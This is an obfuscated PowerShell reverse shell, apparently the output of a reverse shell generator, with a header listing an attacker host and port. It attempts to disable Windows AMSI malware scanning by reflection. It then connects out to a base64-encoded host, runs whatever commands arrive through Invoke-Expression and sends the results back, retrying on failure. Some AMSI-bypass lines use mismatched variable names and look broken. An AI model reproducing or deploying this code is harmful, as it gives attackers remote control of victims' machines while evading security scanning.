# Generated by Elite Reverse Shell Generator
# Timestamp: 2026-02-18 11:08:04
# Category: LOLBAS (Windows)
# Subcategory: Certutil
# Encoder: Polymorphic PowerShell
# LHOST: 192.168.1.21
# LPORT: 4444

# Polymorphic PowerShell Agent
$ErrorActionPreference = "SilentlyContinue"


$mbmjztiyhh1urt3g = [Ref].Assembly.GetType('Sys$(116)e$(109).$(77)$(97)nagement.Automat$(105)o$(110).Amsi$(85)$(116)i$(108)s')
$nOvae5Hho2b = $jwrm_ffno_avrt_x.GetField('$(97)msi$(73)nit$(70)a$(105)$(108)e$(100)','NonPublic,Static')
$pwya_qaab_odgj_p.SetValue($null,$true)


function EncniLiA2 {
    param([string]$dtjzeo5oAoOlcsW5)
    $rsfqf_qtq_meo_yi = [System.Text.Encoding]::UTF8.GetBytes($dtjzeo5oAoOlcsW5)
    return $rsfqf_qtq_meo_yi
}

function Decpusetupiloje {
    param([byte[]]$dtjzeo5oAoOlcsW5)
    $rsfqf_qtq_meo_yi = [System.Text.Encoding]::UTF8.GetString($dtjzeo5oAoOlcsW5)
    return $rsfqf_qtq_meo_yi
}

function Connl4VdDgKoGH {
    param([string]$clzakazu, [int]$st0owqsdj)
    
    while ($true) {
        try {
            $bufdadp9gqhuc = New-Object System.Net.Sockets.TCPClient([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String("MQAyADcALgAwAC4AMAAuADEA")), 4444)
            $dtjzeo5oAoOlcsW5 = $bufdadp9gqhuc.GetStream()
            
            [byte[]]$rsfqf_qtq_meo_yi = 0..65535|%{0}
            
            while (($cmdczb0rizmpuw = $dtjzeo5oAoOlcsW5.Read($rsfqf_qtq_meo_yi, 0, $rsfqf_qtq_meo_yi.Length)) -ne 0) {
                $Execs_g_ = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($rsfqf_qtq_meo_yi, 0, $cmdczb0rizmpuw)
                
                if ($Execs_g_.Trim().ToLower() -eq "exit") {
                    break
                }
                
                try {
                    $rsfqf_qtq_meo_yi = (Invoke-Expression $Execs_g_ 2>&1 | Out-String)
                } catch {
                    $rsfqf_qtq_meo_yi = $_.Exception.Message
                }
                
                $rsfqf_qtq_meo_yi = $rsfqf_qtq_meo_yi + "PS " + (Get-Location).Path + "> "
                $cmdczb0rizmpuw = ([text.encoding]::ASCII).GetBytes($rsfqf_qtq_meo_yi)
                $dtjzeo5oAoOlcsW5.Write($cmdczb0rizmpuw, 0, $cmdczb0rizmpuw.Length)
                $dtjzeo5oAoOlcsW5.Flush()
            }
            
            $dtjzeo5oAoOlcsW5.Close()
            $bufdadp9gqhuc.Close()
            break
            
        } catch {
            Start-Sleep -Seconds 23
            continue
        }
    }
}

# Execute
Connl4VdDgKoGH "[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String("MQAyADcALgAwAC4AMAAuADEA"))" 4444


# Listener Command:
# python3 c2_gui.py  # Start listener on 192.168.1.21:4444